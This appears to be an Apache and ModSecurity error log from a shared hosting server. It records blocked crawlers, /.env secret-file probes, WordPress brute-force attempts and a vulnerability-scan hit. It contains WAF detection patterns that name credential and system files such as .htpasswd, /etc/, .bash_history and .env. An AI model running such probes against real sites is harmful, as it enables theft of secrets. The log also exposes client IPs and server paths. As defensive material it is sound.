[Tue May 26 16:37:11.894903 2026] [security2:error] [pid 808625:tid 808815] [client 216.244.66.241:47278] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahV-3zEl_SBaWibfDmpscgAAADw"]
[Tue May 26 16:37:11.895036 2026] [security2:error] [pid 808625:tid 808815] [client 216.244.66.241:47278] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahV-3zEl_SBaWibfDmpscgAAADw"]
[Tue May 26 16:37:11.895591 2026] [security2:error] [pid 808625:tid 808836] [client 216.244.66.241:47286] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahV-3zEl_SBaWibfDmpscwAAAFE"]
[Tue May 26 16:37:11.895736 2026] [security2:error] [pid 808625:tid 808836] [client 216.244.66.241:47286] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahV-3zEl_SBaWibfDmpscwAAAFE"]
[Tue May 26 16:37:12.495985 2026] [security2:error] [pid 808625:tid 808776] [client 176.65.139.235:64826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "levantefilmes.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahV-4DEl_SBaWibfDmpsegAAABU"]
[Tue May 26 16:37:12.517142 2026] [security2:error] [pid 808625:tid 808756] [client 176.65.139.236:58090] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahV-4DEl_SBaWibfDmpsfgAAAAE"]
[Tue May 26 16:37:12.533540 2026] [security2:error] [pid 808625:tid 808780] [client 176.65.139.237:54728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahV-4DEl_SBaWibfDmpsfwAAABk"]
[Tue May 26 16:37:12.540558 2026] [security2:error] [pid 808625:tid 808830] [client 176.65.139.231:61302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "redstudio.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahV-4DEl_SBaWibfDmpsgAAAAEs"]
[Tue May 26 16:37:12.541615 2026] [security2:error] [pid 808625:tid 808790] [client 176.65.139.239:29450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "alpimentel.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahV-4DEl_SBaWibfDmpsgQAAACM"]
[Tue May 26 16:37:13.601239 2026] [security2:error] [pid 808625:tid 808801] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-4TEl_SBaWibfDmpsiwAAAC4"]
[Tue May 26 16:37:13.853717 2026] [security2:error] [pid 808625:tid 808861] [client 176.65.139.233:48040] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "o2plus.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahV-4TEl_SBaWibfDmpsmwAAAGo"]
[Tue May 26 16:37:17.112081 2026] [security2:error] [pid 808625:tid 808872] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-4zEl_SBaWibfDmpszAAAAHU"]
[Tue May 26 16:37:17.818734 2026] [security2:error] [pid 808625:tid 808800] [client 89.58.64.224:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-5DEl_SBaWibfDmps4QAAAC0"]
[Tue May 26 16:37:18.912811 2026] [security2:error] [pid 808625:tid 808756] [client 205.169.39.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV-5jEl_SBaWibfDmptRgAAAAE"], referer: http://www.ucdc.co.in/
[Tue May 26 16:37:18.984940 2026] [autoindex:error] [pid 808625:tid 808822] [client 205.169.39.134:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.ucdc.co.in/
[Tue May 26 16:37:19.264425 2026] [autoindex:error] [pid 808625:tid 808816] [client 205.169.39.134:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.ucdc.co.in/
[Tue May 26 16:37:19.552269 2026] [security2:error] [pid 808625:tid 808827] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-5TEl_SBaWibfDmptBQAAAEg"]
[Tue May 26 16:37:20.545310 2026] [security2:error] [pid 808625:tid 808764] [client 117.198.37.168:62287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-6DEl_SBaWibfDmptjwAAAAk"]
[Tue May 26 16:37:20.545405 2026] [security2:error] [pid 808625:tid 808764] [client 117.198.37.168:62287] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-6DEl_SBaWibfDmptjwAAAAk"]
[Tue May 26 16:37:20.937426 2026] [security2:error] [pid 808625:tid 808851] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-5zEl_SBaWibfDmptggAAAGA"]
[Tue May 26 16:37:21.034861 2026] [security2:error] [pid 808625:tid 808648] [remote 3.208.180.187:42856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV-6DEl_SBaWibfDmptkwAAXhY"]
[Tue May 26 16:37:22.898598 2026] [security2:error] [pid 808625:tid 808841] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-6TEl_SBaWibfDmptowAAAFY"]
[Tue May 26 16:37:23.853708 2026] [security2:error] [pid 808625:tid 808661] [remote 198.244.242.211:29530] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "makwasi.com"] [uri "/robots.txt"] [unique_id "ahV-6zEl_SBaWibfDmptzAAARyM"]
[Tue May 26 16:37:23.853917 2026] [security2:error] [pid 808625:tid 808826] [client 198.244.242.211:29530] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "makwasi.com"] [uri "/robots.txt"] [unique_id "ahV-6zEl_SBaWibfDmptzAAARyM"]
[Tue May 26 16:37:25.174462 2026] [security2:error] [pid 808625:tid 808864] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-7DEl_SBaWibfDmpt1wAAAG0"]
[Tue May 26 16:37:25.365053 2026] [security2:error] [pid 808625:tid 808663] [remote 148.113.128.225:64368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "makwasi.com"] [uri "/"] [unique_id "ahV-7TEl_SBaWibfDmpt6wAAUyU"]
[Tue May 26 16:37:25.365296 2026] [security2:error] [pid 808625:tid 808838] [client 148.113.128.225:64368] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "makwasi.com"] [uri "/"] [unique_id "ahV-7TEl_SBaWibfDmpt6wAAUyU"]
[Tue May 26 16:37:26.662495 2026] [security2:error] [pid 808625:tid 808789] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-7TEl_SBaWibfDmpt9QAAACI"]
[Tue May 26 16:37:28.471423 2026] [security2:error] [pid 808625:tid 808841] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-7zEl_SBaWibfDmpuGgAAAFY"]
[Tue May 26 16:37:29.709897 2026] [security2:error] [pid 808625:tid 808825] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-8TEl_SBaWibfDmpuNQAAAEY"]
[Tue May 26 16:37:30.981844 2026] [security2:error] [pid 808625:tid 808766] [client 117.198.37.168:62591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-8jEl_SBaWibfDmpuYAAAAAs"]
[Tue May 26 16:37:30.982022 2026] [security2:error] [pid 808625:tid 808766] [client 117.198.37.168:62591] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-8jEl_SBaWibfDmpuYAAAAAs"]
[Tue May 26 16:37:33.063134 2026] [security2:error] [pid 808625:tid 808861] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-8zEl_SBaWibfDmpudgAAAGo"]
[Tue May 26 16:37:34.471098 2026] [security2:error] [pid 808625:tid 808790] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-9TEl_SBaWibfDmpulAAAACM"]
[Tue May 26 16:37:36.239335 2026] [http2:info] [pid 817651:tid 817651] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 16:37:37.526881 2026] [security2:error] [pid 817651:tid 817787] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV--NlGRCPPN1dS2y2UWAAAAIs"]
[Tue May 26 16:37:37.756535 2026] [core:crit] [pid 817651:tid 817837] (13)Permission denied: [client 40.77.167.62:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:37:37.947526 2026] [core:crit] [pid 817651:tid 817857] (13)Permission denied: [client 40.77.167.62:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:37:38.719949 2026] [security2:error] [pid 817651:tid 817854] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV--dlGRCPPN1dS2y2UeQAAAM4"]
[Tue May 26 16:37:40.242985 2026] [security2:error] [pid 817651:tid 817796] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV--9lGRCPPN1dS2y2UmAAAAJQ"]
[Tue May 26 16:37:41.246015 2026] [security2:error] [pid 817651:tid 817867] [client 185.191.171.4:24178] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahV-_dlGRCPPN1dS2y2UxwAAANs"]
[Tue May 26 16:37:41.246151 2026] [security2:error] [pid 817651:tid 817867] [client 185.191.171.4:24178] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahV-_dlGRCPPN1dS2y2UxwAAANs"]
[Tue May 26 16:37:41.676599 2026] [security2:error] [pid 817651:tid 817864] [client 117.198.37.168:62892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-_dlGRCPPN1dS2y2UyAAAANg"]
[Tue May 26 16:37:41.676756 2026] [security2:error] [pid 817651:tid 817864] [client 117.198.37.168:62892] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-_dlGRCPPN1dS2y2UyAAAANg"]
[Tue May 26 16:37:42.159860 2026] [security2:error] [pid 817651:tid 817887] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-_dlGRCPPN1dS2y2UxAAAAO8"]
[Tue May 26 16:37:43.529052 2026] [security2:error] [pid 817651:tid 817718] [remote 74.7.241.58:40460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV-_9lGRCPPN1dS2y2U7AAAoUI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:37:43.799021 2026] [security2:error] [pid 817651:tid 817846] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-_9lGRCPPN1dS2y2U5QAAAMY"]
[Tue May 26 16:37:43.876498 2026] [security2:error] [pid 817651:tid 817700] [remote 65.2.90.30:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahV-_9lGRCPPN1dS2y2U-QAAkjA"]
[Tue May 26 16:37:44.290844 2026] [security2:error] [pid 817651:tid 817835] [client 94.26.106.125:64777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV_ANlGRCPPN1dS2y2U-wAAALs"]
[Tue May 26 16:37:44.609785 2026] [security2:error] [pid 817651:tid 817908] [client 94.26.106.125:65036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV_ANlGRCPPN1dS2y2VAgAAAQQ"], referer: https://t.co/
[Tue May 26 16:37:44.751938 2026] [security2:error] [pid 817651:tid 817825] [client 146.174.179.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-_9lGRCPPN1dS2y2U9QAAALE"]
[Tue May 26 16:37:45.119322 2026] [core:error] [pid 817651:tid 817872] [client 94.26.106.125:57500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://t.co/
[Tue May 26 16:37:45.119360 2026] [core:error] [pid 817651:tid 817872] [client 94.26.106.125:57500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://t.co/
[Tue May 26 16:37:45.931258 2026] [security2:error] [pid 817651:tid 817813] [client 114.119.137.103:46475] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/burlington.php"] [unique_id "ahV_AdlGRCPPN1dS2y2VHAAAAKU"], referer: https://www.toronto121mortgage.com/
[Tue May 26 16:37:46.463831 2026] [security2:error] [pid 817651:tid 817834] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_AdlGRCPPN1dS2y2VGgAAALo"]
[Tue May 26 16:37:47.697297 2026] [security2:error] [pid 817651:tid 817892] [client 114.119.155.144:25025] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/cbc-barbados-obituaries.html"] [unique_id "ahV_A9lGRCPPN1dS2y2VOgAAAPQ"], referer: https://whitesun.in/1hfq/cbc-barbados-obituaries.html
[Tue May 26 16:37:48.003471 2026] [security2:error] [pid 817651:tid 817835] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_A9lGRCPPN1dS2y2VNgAAALs"]
[Tue May 26 16:37:49.876076 2026] [security2:error] [pid 817651:tid 817882] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_BdlGRCPPN1dS2y2VYAAAAOo"]
[Tue May 26 16:37:50.368189 2026] [core:error] [pid 817651:tid 817827] [client 205.210.31.88:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:37:50.368210 2026] [core:error] [pid 817651:tid 817827] [client 205.210.31.88:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:37:51.228125 2026] [security2:error] [pid 817651:tid 817902] [client 149.107.244.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahV_BtlGRCPPN1dS2y2VhwAAAP4"]
